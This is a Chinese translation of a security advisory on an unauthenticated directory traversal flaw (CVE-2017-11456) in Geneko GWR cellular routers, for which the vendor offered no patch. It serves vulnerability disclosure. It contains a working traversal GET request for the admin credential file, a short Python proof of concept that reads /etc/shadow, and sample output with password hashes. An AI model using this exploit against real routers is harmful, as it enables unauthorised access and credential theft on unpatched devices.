Geneko路由器無需認證目錄遍歷漏洞

原文地址：

https://blogs.securiteam.com/index.php/archives/3317

作者：ssd@beyondsecurity.com

譯者：cnRay

01漏洞概要&廠商回應

漏洞概要

以下通報描述了Geneko GWR 路由器系列中發現的無需認證的目錄遍歷漏洞。Geneko GWR 是小巧且划算的通信解決方案，為固定和移動應用（如數據採集，智能計量，遠程監控和管理）提供蜂窩功能。GWR支持2G,3G以及4G蜂窩技術上的各種無線電頻段選項。

廠商回應

我們已於2017年5月28日通知Geneko該漏洞，我們收到的最後一封電子郵件是在2017年6月7日。我們沒有可用的補丁或關於該漏洞的解決方法。 CVE：CVE-2017-11456

01漏洞詳情

用戶控制的輸入未被充分消毒，然後傳遞給負責訪問文件系統的功能。成功利用此漏洞使遠程未經身份驗證的用戶能夠讀取主機上存在的任何文件的內容，這包括位於Web根文件夾外部的文件。

通過發送以下GET請求，您可以直接訪問配置文件，從而允許您登錄登錄面板：

GET /../../../../../../../../../../../../mnt/flash/params/j_admin_admin.params HTTP/1.1

Host:

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:53.0) Gecko/20100101 Firefox/53.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: de,en-US;q=0.7,en;q=0.3

Connection: close

Upgrade-Insecure-Requests: 1

01路由器響應&概念性證明

路由器響應

概念性證明

path_traversal.py

import requests

import sys

domain = sys.argv[1]

r = requests.get("http://"+domain+"/../../../../../etc/shadow")

print r.content

路由器會響應

root:$1$ryjw5yTs$xoQlzavABZ5c7gQuD7jKO0:10933:0:99999:7:::

bin:*:10933:0:99999:7:::

daemon:*:10933:0:99999:7:::

adm:*:10933:0:99999:7:::

lp:*:10933:0:99999:7:::

sync:*:10933:0:99999:7:::

shutdown:*:10933:0:99999:7:::

halt:*:10933:0:99999:7:::

uucp:*:10933:0:99999:7:::

operator:*:10933:0:99999:7:::

nobody:*:10933:0:99999:7:::

admin:$1$72G6z9YF$cs5dS2elxOD3qicUTlEHO/:10933:0:99999:7:::

- END -

致力於研究網路安全，白帽安全學習討論，業界安全新聞學習資料推送

gitsec長按識別二維碼，關注我們

推薦閱讀：